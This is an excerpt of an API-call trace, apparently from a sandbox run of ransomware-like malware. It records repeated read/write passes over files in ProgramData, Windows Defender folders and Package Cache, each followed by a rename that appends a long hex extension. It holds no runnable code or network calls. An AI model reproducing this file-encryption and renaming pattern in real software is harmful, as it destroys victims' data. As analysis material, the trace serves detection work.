GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0106.676] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x28fff70) returned 0x0 [0106.677] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml", lpString2=".E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml.E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756" [0106.677] GetProcessHeap () returned 0x600000 [0106.677] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x318fa98 [0106.677] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x28fff60, FileInformation=0x318fa98, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0106.678] CloseHandle (hObject=0x314) returned 1 [0106.680] GetProcessHeap () returned 0x600000 [0106.680] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.682] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0106.951] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.952] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0106.968] WriteFile (in: hFile=0x31c, lpBuffer=0x3183f08*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3163dd0) returned 1 [0106.969] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0106.971] WriteFile (in: hFile=0x32c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0106.972] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.352] WriteFile (in: hFile=0x308, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0107.367] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.416] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x28fff70) returned 0x0 [0107.416] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user.png", lpString2=".5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user.png.5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\User Account Pictures\\user.png.5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69" [0107.416] GetProcessHeap () returned 0x600000 [0107.416] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x6efb18 [0107.417] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x6efb18, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0107.417] CloseHandle (hObject=0x32c) returned 1 [0107.419] GetProcessHeap () returned 0x600000 [0107.419] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.419] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.455] ReadFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x6400, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.455] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.456] WriteFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x6400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0107.458] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.464] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x28fff70) returned 0x0 [0107.464] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt", lpString2=".B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt.B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt.B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E" [0107.464] GetProcessHeap () returned 0x600000 [0107.464] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x6efc50 [0107.464] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x28fff60, FileInformation=0x6efc50, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0107.465] CloseHandle (hObject=0x314) returned 1 [0107.467] GetProcessHeap () returned 0x600000 [0107.467] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.468] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.784] ReadFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0107.784] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.785] WriteFile (in: hFile=0x314, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0107.790] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0107.791] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x28fff70) returned 0x0 [0107.791] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin", lpString2=".3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.3F22C47BD587BDA830881836DAE47518E8AE9E78DC24686F6632C1DAF18E2578" [0107.791] GetProcessHeap () returned 0x600000 [0107.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x6efdc8 [0107.791] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x28fff60, FileInformation=0x6efdc8, Length=0x186, FileInformationClass=0xa) returned 0x0 [0107.792] CloseHandle (hObject=0x314) returned 1 [0108.123] GetProcessHeap () returned 0x600000 [0108.123] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0108.125] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0108.126] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x28fff70) returned 0x0 [0108.126] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png", lpString2=".0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png.0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\Windows Live\\WLive48x48.png.0BA7776161BACF351E19EB9E8BB544CB531EAC342681BD97DCC39BAB5D6C6D69" [0108.127] GetProcessHeap () returned 0x600000 [0108.127] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x6f00b8 [0108.127] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x6f00b8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0108.129] CloseHandle (hObject=0x308) returned 1 [0108.131] GetProcessHeap () returned 0x600000 [0108.131] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.132] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0108.243] ReadFile (in: hFile=0x310, lpBuffer=0x3183f08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0 | out: lpBuffer=0x3183f08*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3163dd0) returned 1 [0108.243] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0108.244] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x3163e80, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x3163e80, ReturnLength=0x28fff70) returned 0x0 [0108.245] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F" [0108.245] GetProcessHeap () returned 0x600000 [0108.245] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b0) returned 0x6f01e8 [0108.245] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x28fff60, FileInformation=0x6f01e8, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0108.246] CloseHandle (hObject=0x310) returned 1 [0108.553] GetProcessHeap () returned 0x600000 [0108.553] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0108.554] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0108.577] WriteFile (in: hFile=0x32c, lpBuffer=0x6a1488, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x681350 | out: lpBuffer=0x6a1488, lpNumberOfBytesWritten=0x0, lpOverlapped=0x681350) returned 0x0 [0108.579] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0108.594] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x681400, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x681400, ReturnLength=0x28fff70) returned 0x0 [0108.594] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.F73C8DADC880FD3E1F1E1EF8B3DEA54D938BC56F338A80BEA0AB60C31FC77243" [0108.594] GetProcessHeap () returned 0x600000 [0108.594] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b2) returned 0x30f0f48 [0108.594] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x30f0f48, Length=0x1b2, FileInformationClass=0xa) returned 0x0 [0108.595] CloseHandle (hObject=0x32c) returned 1 [0108.771] GetProcessHeap () returned 0x600000 [0108.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0108.772] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.047] ReadFile (in: hFile=0x314, lpBuffer=0x6a1488, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x681350 | out: lpBuffer=0x6a1488*, lpNumberOfBytesRead=0x0, lpOverlapped=0x681350) returned 1 [0109.048] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.048] WriteFile (in: hFile=0x314, lpBuffer=0x6a1488*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x681350 | out: lpBuffer=0x6a1488*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x681350) returned 1 [0109.050] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.051] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x681400, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x681400, ReturnLength=0x28fff70) returned 0x0 [0109.051] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.543182C5B310AABCBB8805B614E14164430CAA1DA63D19B807CEB35AE10DE67B" [0109.051] GetProcessHeap () returned 0x600000 [0109.051] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ac) returned 0x6f0708 [0109.052] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x28fff60, FileInformation=0x6f0708, Length=0x1ac, FileInformationClass=0xa) returned 0x0 [0109.053] CloseHandle (hObject=0x314) returned 1 [0109.082] GetProcessHeap () returned 0x600000 [0109.082] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0109.083] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.100] ReadFile (in: hFile=0x32c, lpBuffer=0x6a1488, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x681350 | out: lpBuffer=0x6a1488*, lpNumberOfBytesRead=0x0, lpOverlapped=0x681350) returned 1 [0109.100] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.100] WriteFile (in: hFile=0x32c, lpBuffer=0x6a1488, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x681350 | out: lpBuffer=0x6a1488, lpNumberOfBytesWritten=0x0, lpOverlapped=0x681350) returned 0x0 [0109.101] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.118] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x681400, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x681400, ReturnLength=0x28fff70) returned 0x0 [0109.118] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146" [0109.118] GetProcessHeap () returned 0x600000 [0109.118] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ae) returned 0x6f6a18 [0109.119] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x6f6a18, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0109.120] CloseHandle (hObject=0x32c) returned 1 [0109.447] GetProcessHeap () returned 0x600000 [0109.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0109.448] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.473] ReadFile (in: hFile=0x308, lpBuffer=0x691480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x671348 | out: lpBuffer=0x691480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x671348) returned 1 [0109.473] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.474] WriteFile (in: hFile=0x308, lpBuffer=0x691480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x671348 | out: lpBuffer=0x691480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x671348) returned 1 [0109.506] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.506] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x6713f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6713f8, ReturnLength=0x28fff70) returned 0x0 [0109.507] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.7EEBD4DE2F6238176BD6035C992FBDD08F9F5EC6F80B25A681125C2706CDCD5D" [0109.507] GetProcessHeap () returned 0x600000 [0109.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1ae) returned 0x6f2f18 [0109.507] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x6f2f18, Length=0x1ae, FileInformationClass=0xa) returned 0x0 [0109.510] CloseHandle (hObject=0x308) returned 1 [0109.680] GetProcessHeap () returned 0x600000 [0109.680] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0109.681] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0109.751] ReadFile (in: hFile=0x304, lpBuffer=0x315b140, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0109.753] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, 